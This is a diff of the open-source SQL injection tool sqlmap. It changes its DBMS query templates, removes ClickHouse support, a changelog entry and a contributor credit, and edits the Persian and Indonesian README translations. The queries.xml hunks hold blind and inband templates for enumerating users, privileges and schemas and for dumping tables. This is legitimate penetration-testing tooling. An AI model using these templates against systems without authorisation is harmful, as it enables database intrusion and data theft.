<banner query="SELECT service_level FROM TABLE(sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS CAP,versionnumber FROM sysibm.sysversions) AS qq WHERE CAP=1"/>
|
||||
<banner query="SELECT service_level FROM TABLE(sysproc.env_get_inst_info())" query2="SELECT versionnumber FROM (SELECT ROW_NUMBER() OVER (ORDER BY versionnumber DESC) AS LIMIT,versionnumber FROM sysibm.sysversions) AS qq WHERE LIMIT=1"/>
|
||||
<current_user query="SELECT user FROM SYSIBM.SYSDUMMY1"/>
|
||||
<!-- NOTE: On DB2 we use the current user as default schema (database) -->
|
||||
<current_db query="SELECT user FROM SYSIBM.SYSDUMMY1"/>
|
||||
@@ -631,24 +631,24 @@
|
||||
<is_dba query="(SELECT dbadmauth FROM syscat.dbauth WHERE grantee=current user)='Y'"/>
|
||||
<users>
|
||||
<inband query="SELECT grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
|
||||
<blind query="SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS CAP,grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS qq WHERE CAP=%d" count="SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
|
||||
<blind query="SELECT grantee FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,grantee FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC') AS qq WHERE LIMIT=%d" count="SELECT COUNT(DISTINCT(grantee)) FROM sysibm.sysdbauth WHERE grantee!='SYSTEM' AND grantee!='PUBLIC'"/>
|
||||
</users>
|
||||
<!-- NOTE: On DB2 it is not possible to list password hashes, since they are handled by the OS -->
|
||||
<passwords/>
|
||||
<privileges>
|
||||
<inband query="SELECT grantee,RTRIM(tabschema)||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM syscat.tabauth" condition="grantee"/>
|
||||
<blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS CAP,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS qq WHERE CAP=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
|
||||
<blind query="SELECT tabschema||'.'||tabname||','||controlauth||alterauth||deleteauth||indexauth||insertauth||refauth||selectauth||updateauth FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,syscat.tabauth.* FROM syscat.tabauth WHERE grantee='%s') AS qq WHERE LIMIT=%d" count="SELECT COUNT(*) FROM syscat.tabauth WHERE grantee='%s'"/>
|
||||
</privileges>
|
||||
<roles/>
|
||||
<statements/>
|
||||
<!-- NOTE: in DB2 schema names are the counterpart to database names on other DBMSes -->
|
||||
<dbs>
|
||||
<inband query="SELECT schemaname FROM syscat.schemata"/>
|
||||
<blind query="SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS CAP,schemaname FROM syscat.schemata) AS qq WHERE CAP=%d" count="SELECT COUNT(schemaname) FROM syscat.schemata"/>
|
||||
<blind query="SELECT schemaname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,schemaname FROM syscat.schemata) AS qq WHERE LIMIT=%d" count="SELECT COUNT(schemaname) FROM syscat.schemata"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT tabschema,tabname FROM sysstat.tables" condition="tabschema"/>
|
||||
<blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS CAP,tabname FROM sysstat.tables WHERE tabschema='%s') AS qq WHERE CAP=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
|
||||
<blind query="SELECT tabname FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,tabname FROM sysstat.tables WHERE tabschema='%s') AS qq WHERE LIMIT=INT('%d')" count="SELECT COUNT(*) FROM sysstat.tables WHERE tabschema='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT name,RTRIM(coltype)||'('||RTRIM(CAST(length AS CHAR(254)))||')' FROM sysibm.syscolumns WHERE tbname='%s' AND tbcreator='%s'" condition="name"/>
|
||||
@@ -656,7 +656,7 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT ENTRY_VALUE FROM (SELECT ROW_NUMBER() OVER () AS CAP,%s AS ENTRY_VALUE FROM %s) AS qq WHERE CAP=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
<blind query="SELECT ENTRY_VALUE FROM (SELECT ROW_NUMBER() OVER () AS LIMIT,%s AS ENTRY_VALUE FROM %s) AS qq WHERE LIMIT=%d" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<search_db>
|
||||
<inband query="SELECT schemaname FROM syscat.schemata WHERE %s" condition="schemaname"/>
|
||||
@@ -679,8 +679,8 @@
|
||||
<delimiter query="||"/>
|
||||
<limit query="LIMIT %d %d" query2="LIMIT %d OFFSET %d"/>
|
||||
<limitregexp query="\s+LIMIT\s+([\d]+)\s*\,\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
||||
<limitgroupstart query="2"/>
|
||||
<limitgroupstop query="1"/>
|
||||
<limitgroupstart query="1"/>
|
||||
<limitgroupstop query="2"/>
|
||||
<limitstring query=" LIMIT "/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
@@ -747,10 +747,10 @@
|
||||
<length query="CHAR_LENGTH(%s)"/>
|
||||
<isnull query="IFNULL(%s,' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="LIMIT %d OFFSET %d"/>
|
||||
<limitregexp query="\s+LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
||||
<limitgroupstart query="2"/>
|
||||
<limitgroupstop query="1"/>
|
||||
<limit query="OFFSET %d LIMIT %d"/>
|
||||
<limitregexp query="\s+OFFSET\s+([\d]+)\s+LIMIT\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
||||
<limitgroupstart query="1"/>
|
||||
<limitgroupstop query="2"/>
|
||||
<limitstring query=" OFFSET "/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
@@ -770,7 +770,7 @@
|
||||
<check_udf/>
|
||||
<users>
|
||||
<inband query="SELECT NAME FROM INFORMATION_SCHEMA.USERS"/>
|
||||
<blind query="SELECT NAME FROM INFORMATION_SCHEMA.USERS LIMIT 1 OFFSET %d" count="SELECT COUNT(NAME) FROM INFORMATION_SCHEMA.USERS"/>
|
||||
<blind query="SELECT NAME FROM INFORMATION_SCHEMA.USERS OFFSET %d LIMIT 1" count="SELECT COUNT(NAME) FROM INFORMATION_SCHEMA.USERS"/>
|
||||
</users>
|
||||
<passwords/>
|
||||
<privileges/>
|
||||
@@ -778,11 +778,11 @@
|
||||
<statements/>
|
||||
<dbs>
|
||||
<inband query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA"/>
|
||||
<blind query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1 OFFSET %d" count="SELECT COUNT(SCHEMA_NAME) FROM INFORMATION_SCHEMA.SCHEMATA"/>
|
||||
<blind query="SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA OFFSET %d LIMIT 1" count="SELECT COUNT(SCHEMA_NAME) FROM INFORMATION_SCHEMA.SCHEMATA"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT TABLE_SCHEMA,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES" condition="TABLE_SCHEMA"/>
|
||||
<blind query="SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s' LIMIT 1 OFFSET %d" count="SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s'"/>
|
||||
<blind query="SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s' OFFSET %d LIMIT 1" count="SELECT COUNT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<blind query="SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s' ORDER BY COLUMN_NAME" query2="SELECT TYPE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND COLUMN_NAME='%s' AND TABLE_SCHEMA='%s'" count="SELECT COUNT(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='%s' AND TABLE_SCHEMA='%s'" condition="COLUMN_NAME"/>
|
||||
@@ -875,8 +875,8 @@
|
||||
<delimiter query="||"/>
|
||||
<limit query="LIMIT %d OFFSET %d"/>
|
||||
<limitregexp query="\s+LIMIT\s+([\d]+)\s*OFFSET\s*([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
||||
<limitgroupstart query="2"/>
|
||||
<limitgroupstop query="1"/>
|
||||
<limitgroupstart query="1"/>
|
||||
<limitgroupstop query="2"/>
|
||||
<limitstring query=" LIMIT "/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
@@ -938,10 +938,10 @@
|
||||
<length query="LENGTH(RTRIM(CAST(%s AS CHAR(254))))"/>
|
||||
<isnull query="COALESCE(%s,' ')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="OFFSET %d ROWS FETCH FIRST %d ROWS ONLY"/>
|
||||
<limitregexp query="OFFSET\s+([\d]+)\s+ROWS\s+FETCH\s+FIRST\s+([\d]+)\s+ROWS\s+ONLY"/>
|
||||
<limitgroupstart query="1"/>
|
||||
<limitgroupstop query="2"/>
|
||||
<limit query="{LIMIT %d OFFSET %d}"/>
|
||||
<limitregexp query="{LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)}"/>
|
||||
<limitgroupstart query="2"/>
|
||||
<limitgroupstop query="1"/>
|
||||
<limitstring/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
@@ -962,11 +962,11 @@
|
||||
<is_dba query="(SELECT COUNT(*) FROM SYS.SYSUSERS)>=0"/>
|
||||
<dbs>
|
||||
<inband query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS"/>
|
||||
<blind query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS"/>
|
||||
<blind query="SELECT SCHEMANAME FROM SYS.SYSSCHEMAS {LIMIT 1 OFFSET %d}" count="SELECT COUNT(SCHEMANAME) FROM SYS.SYSSCHEMAS"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT SCHEMANAME,TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID" condition="SCHEMANAME"/>
|
||||
<blind query="SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'"/>
|
||||
<blind query="SELECT TABLENAME FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s' {LIMIT 1 OFFSET %d}" count="SELECT COUNT(TABLENAME) FROM SYS.SYSTABLES JOIN SYS.SYSSCHEMAS ON SYS.SYSTABLES.SCHEMAID=SYS.SYSSCHEMAS.SCHEMAID WHERE SCHEMANAME='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<!-- NOTE: COLUMNDATATYPE without CAST() causes problems during enumeration -->
|
||||
@@ -975,11 +975,11 @@
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s"/>
|
||||
<blind query="SELECT %s FROM %s OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(*) FROM %s"/>
|
||||
<blind query="SELECT %s FROM %s {LIMIT 1 OFFSET %d}" count="SELECT COUNT(*) FROM %s"/>
|
||||
</dump_table>
|
||||
<users>
|
||||
<inband query="SELECT USERNAME FROM SYS.SYSUSERS"/>
|
||||
<blind query="SELECT USERNAME FROM SYS.SYSUSERS OFFSET %d ROWS FETCH FIRST 1 ROW ONLY" count="SELECT COUNT(USERNAME) FROM SYS.SYSUSERS"/>
|
||||
<blind query="SELECT USERNAME FROM SYS.SYSUSERS {LIMIT 1 OFFSET %d}" count="SELECT COUNT(USERNAME) FROM SYS.SYSUSERS"/>
|
||||
</users>
|
||||
<!-- NOTE: No one can view the 'SYSUSERS'.'PASSWORD' column -->
|
||||
<passwords/>
|
||||
@@ -1319,75 +1319,6 @@
|
||||
</search_column>
|
||||
</dbms>
|
||||
|
||||
<dbms value="ClickHouse">
|
||||
<cast query="CAST(%s AS String)"/>
|
||||
<length query="length(%s)"/>
|
||||
<isnull query="ifNull(%s, '')"/>
|
||||
<delimiter query="||"/>
|
||||
<limit query="LIMIT %d OFFSET %d"/>
|
||||
<limitregexp query="\s+LIMIT\s+([\d]+)\s+OFFSET\s+([\d]+)" query2="\s+LIMIT\s+([\d]+)"/>
|
||||
<limitgroupstart query="2"/>
|
||||
<limitgroupstop query="1"/>
|
||||
<limitstring query=" LIMIT "/>
|
||||
<order query="ORDER BY %s ASC"/>
|
||||
<count query="COUNT(%s)"/>
|
||||
<comment query="--" query2="//"/>
|
||||
<substring query="substring(%s,%d,%d)"/>
|
||||
<concatenate query="%s||%s"/>
|
||||
<case query="SELECT (CASE WHEN (%s) THEN '1' ELSE '0' END)"/>
|
||||
<inference query="substring((%s),%d,1)>'%c'" />
|
||||
<banner query="select version()"/>
|
||||
<current_user query="currentUser()"/>
|
||||
<current_db query="currentDatabase()"/>
|
||||
<hostname query="hostName()"/>
|
||||
<table_comment/>
|
||||
<column_comment/>
|
||||
<is_dba query="(SELECT access_type FROM system.grants WHERE user_name=currentUser())='ALL'"/>
|
||||
<check_udf/>
|
||||
<users>
|
||||
<inband query="SELECT name FROM system.users"/>
|
||||
<blind query="SELECT name FROM system.users LIMIT %d,1" count="SELECT COUNT(name) FROM system.users"/>
|
||||
</users>
|
||||
<passwords/>
|
||||
<privileges>
|
||||
<inband query="SELECT DISTINCT user_name,access_type FROM system.grants" condition="user_name"/>
|
||||
<blind query="SELECT DISTINCT(access_type) FROM system.grants WHERE user_name='%s' ORDER BY access_type LIMIT %d,1" count="SELECT COUNT(DISTINCT(access_type)) FROM system.grants WHERE user_name='%s'"/>
|
||||
</privileges>
|
||||
<roles>
|
||||
<inband query="SELECT DISTINCT user_name,role_name FROM system.role_grants" condition="user_name"/>
|
||||
<blind query="SELECT DISTINCT(role_name) FROM system.role_grants WHERE user_name='%s' ORDER BY role_name LIMIT %d,1" count="SELECT COUNT(DISTINCT(role_name)) FROM system.role_grants WHERE user_name='%s'"/>
|
||||
</roles>
|
||||
<statements/>
|
||||
<dbs>
|
||||
<inband query="SELECT schema_name FROM information_schema.schemata"/>
|
||||
<blind query="SELECT schema_name FROM information_schema.schemata ORDER BY schema_name LIMIT 1 OFFSET %d" count="SELECT COUNT(schema_name) FROM information_schema.schemata"/>
|
||||
</dbs>
|
||||
<tables>
|
||||
<inband query="SELECT table_schema,table_name FROM information_schema.tables" condition="table_schema"/>
|
||||
<blind query="SELECT table_name FROM information_schema.tables WHERE table_schema='%s' LIMIT 1 OFFSET %d" count="SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema='%s'"/>
|
||||
</tables>
|
||||
<columns>
|
||||
<inband query="SELECT column_name,column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
|
||||
<blind query="SELECT column_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s' LIMIT %d,1" query2="SELECT column_type FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND column_name='%s' AND table_schema='%s'" count="SELECT COUNT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='%s' AND table_schema='%s'" condition="column_name"/>
|
||||
</columns>
|
||||
<dump_table>
|
||||
<inband query="SELECT %s FROM %s.%s ORDER BY %s"/>
|
||||
<blind query="SELECT %s FROM %s.%s ORDER BY %s LIMIT %d,1 " count="SELECT COUNT(*) FROM %s.%s"/>
|
||||
</dump_table>
|
||||
<search_table>
|
||||
<inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.TABLES WHERE %s" condition="table_name" condition2="table_schema"/>
|
||||
<blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.TABLES WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.TABLES WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='%s'" condition="table_name" condition2="table_schema"/>
|
||||
</search_table>
|
||||
<search_column>
|
||||
<inband query="SELECT table_schema,table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" condition="column_name" condition2="table_schema" condition3="table_name"/>
|
||||
<blind query="SELECT DISTINCT(table_schema) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" query2="SELECT DISTINCT(table_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" count="SELECT COUNT(DISTINCT(table_schema)) FROM INFORMATION_SCHEMA.COLUMNS WHERE %s" count2="SELECT COUNT(DISTINCT(table_name)) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema='%s'" condition="column_name" condition2="table_schema" condition3="table_name"/>
|
||||
</search_column>
|
||||
<search_db>
|
||||
<inband query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
|
||||
<blind query="SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" count="SELECT COUNT(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA WHERE %s" condition="schema_name"/>
|
||||
</search_db>
|
||||
</dbms>
|
||||
|
||||
<dbms value="CrateDB">
|
||||
<cast query="CAST(%s AS TEXT)"/>
|
||||
<length query="CHAR_LENGTH((%s)::text)"/>
|
||||
|
||||
@@ -1,8 +1,3 @@
|
||||
# Version 1.7 (2022-01-02)
|
||||
|
||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.6...1.7)
|
||||
* [View issues](https://github.com/sqlmapproject/sqlmap/milestone/8?closed=1)
|
||||
|
||||
# Version 1.6 (2022-01-03)
|
||||
|
||||
* [View changes](https://github.com/sqlmapproject/sqlmap/compare/1.5...1.6)
|
||||
|
||||
@@ -109,9 +109,6 @@ Alessandro Curio, <alessandro.curio(at)gmail.com>
|
||||
Alessio Dalla Piazza, <alessio.dallapiazza(at)gmail.com>
|
||||
* for reporting a couple of bugs
|
||||
|
||||
Alexis Danizan, <alexis.danizan(at)synacktiv.com>
|
||||
* for contributing support for ClickHouse
|
||||
|
||||
Sherif El-Deeb, <archeldeeb(at)gmail.com>
|
||||
* for reporting a minor bug
|
||||
|
||||
|
||||
@@ -7,10 +7,10 @@
|
||||
|
||||
|
||||
|
||||
برنامه `sqlmap`، یک برنامهی تست نفوذ منبع باز است که فرآیند تشخیص و اکسپلویت پایگاه های داده با مشکل امنیتی SQL Injection را بطور خودکار انجام می دهد. این برنامه مجهز به موتور تشخیص قدرتمندی میباشد. همچنین داری طیف گستردهای از اسکریپت ها میباشد که برای متخصصان تست نفوذ کار کردن با بانک اطلاعاتی را راحتر میکند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم و اجرا دستورات از طریق ارتباط Out Of Band درسیستم عامل را امکان پذیر میکند.
|
||||
برنامه `sqlmap`، برنامهی منبع باز هست که برای تست نفوذ پذیزی دربرابر حملههای احتمالی `sql injection` (جلوگیری از لو رفتن پایگاه داده) جلو گیری میکند. این برنامه مجهز به مکانیزیم تشخیص قدرتمندی میباشد. همچنین داری طیف گستردهای از اسکریپت ها میباشد که برای متخصص تست نفوذ کار کردن با بانک اطلاعاتی را راحتر میکند. از جمع اوری اطلاعات درباره بانک داده تا دسترسی به داده های سیستم و اجرا دستورات از طریق `via out-of-band` درسیستم عامل را امکان پذیر میکند.
|
||||
|
||||
|
||||
تصویر محیط ابزار
|
||||
عکس
|
||||
----
|
||||
|
||||
|
||||
@@ -23,7 +23,7 @@
|
||||
|
||||
<div dir=rtl>
|
||||
|
||||
برای نمایش [مجموعه ای از اسکریپتها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) میتوانید از دانشنامه دیدن کنید.
|
||||
برای دیدن کردن از [مجموعهی از اسکریپتها](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) میتوانید از ویکی دیدن کنید.
|
||||
|
||||
|
||||
نصب
|
||||
@@ -32,11 +32,11 @@
|
||||
برای دانلود اخرین نسخه tarball، با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/tarball/master) یا دانلود اخرین نسخه zipball با کلیک در [اینجا](https://github.com/sqlmapproject/sqlmap/zipball/master) میتوانید این کار را انجام دهید.
|
||||
|
||||
|
||||
نحوه استفاده
|
||||
طرز استفاده
|
||||
----
|
||||
|
||||
|
||||
برای دریافت لیست ارگومانهای اساسی میتوانید از دستور زیر استفاده کنید:
|
||||
برای گرفتن لیست ارگومانهای اساسی میتوانید از دستور زیر استفاده کنید:
|
||||
|
||||
|
||||
|
||||
@@ -53,7 +53,7 @@
|
||||
<div dir=rtl>
|
||||
|
||||
|
||||
برای دریافت لیست تمامی ارگومانها میتوانید از دستور زیر استفاده کنید:
|
||||
برای گرفتن لیست تمامی ارگومانهای میتوانید از دستور زیر استفاده کنید:
|
||||
|
||||
<div dir=ltr>
|
||||
|
||||
@@ -66,7 +66,7 @@
|
||||
<div dir=rtl>
|
||||
|
||||
|
||||
برای اجرای سریع و ساده ابزار می توانید از [اینجا](https://asciinema.org/a/46601) استفاده کنید. برای دریافت اطلاعات بیشتر در رابطه با قابلیت ها ، امکانات قابل پشتیبانی و لیست کامل امکانات و دستورات همراه با مثال می توانید به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید.
|
||||
برای اطلاعات بیشتر برای اجرا از [اینجا](https://asciinema.org/a/46601) میتوانید استفاده کنید. برای گرفتن اطلاعات بیشتر توسعه میشود به [راهنمای](https://github.com/sqlmapproject/sqlmap/wiki/Usage) `sqlmap` سر بزنید.
|
||||
|
||||
|
||||
لینکها
|
||||
@@ -74,11 +74,11 @@
|
||||
|
||||
|
||||
* خانه: https://sqlmap.org
|
||||
* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) یا [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* پیگیری مشکلات: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* دانلود: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* کایمت و نظرات: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* پیگری مشکلات: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* راهنمای کاربران: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* سوالات متداول: https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* توییتر: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* تویتر: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* رسانه: [https://www.youtube.com/user/inquisb/videos](https://www.youtube.com/user/inquisb/videos)
|
||||
* تصاویر: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
* عکسها: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
|
||||
@@ -2,23 +2,21 @@
|
||||
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
sqlmap adalah alat bantu proyek sumber terbuka yang digunakan untuk melakukan uji penetrasi, mengotomasi proses deteksi, eksploitasi kelemahan _SQL injection_ serta pengambil-alihan server basis data.
|
||||
|
||||
sqlmap dilengkapi dengan pendeteksi canggih dan fitur-fitur handal yang berguna bagi _penetration tester_. Alat ini menawarkan berbagai cara untuk mendeteksi basis data bahkan dapat mengakses sistem file dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
|
||||
sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basis data. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur handal bagi _penetration tester_, beragam cara untuk mendeteksi basis data, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
|
||||
|
||||
Tangkapan Layar
|
||||
----
|
||||
|
||||
|
||||
|
||||
Anda juga dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
|
||||
Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki.
|
||||
|
||||
Instalasi
|
||||
----
|
||||
|
||||
Anda dapat mengunduh tarball versi terbaru [di sini](https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master).
|
||||
|
||||
Sebagai alternatif, Anda dapat mengunduh sqlmap dengan melakukan _clone_ pada repositori [Git](https://github.com/sqlmapproject/sqlmap):
|
||||
Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap):
|
||||
|
||||
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
|
||||
|
||||
@@ -27,27 +25,26 @@ sqlmap berfungsi langsung pada [Python](https://www.python.org/download/) versi
|
||||
Penggunaan
|
||||
----
|
||||
|
||||
Untuk mendapatkan daftar opsi dasar gunakan perintah:
|
||||
Untuk mendapatkan daftar opsi dasar gunakan:
|
||||
|
||||
python sqlmap.py -h
|
||||
|
||||
Untuk mendapatkan daftar opsi lanjutan gunakan perintah:
|
||||
Untuk mendapatkan daftar opsi lanjut gunakan:
|
||||
|
||||
python sqlmap.py -hh
|
||||
|
||||
Anda dapat mendapatkan contoh penggunaan [di sini](https://asciinema.org/a/46601).
|
||||
|
||||
Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya. Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [Panduan Pengguna](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
|
||||
|
||||
Tautan
|
||||
----
|
||||
|
||||
* Situs: https://sqlmap.org
|
||||
* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
|
||||
* RSS Feed Dari Commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom
|
||||
* Pelacak Masalah: https://github.com/sqlmapproject/sqlmap/issues
|
||||
* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki
|
||||
* Pertanyaan Yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
|
||||
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
|
||||
* Video Demo [#1](https://www.youtube.com/user/inquisb/videos) dan [#2](https://www.youtube.com/user/stamparm/videos)
|
||||
* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
|
||||
|
||||
@@ -1,50 +0,0 @@
|
||||
# sqlmap 
|
||||
|
||||
[](https://github.com/sqlmapproject/sqlmap/actions/workflows/tests.yml) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
|
||||
|
||||
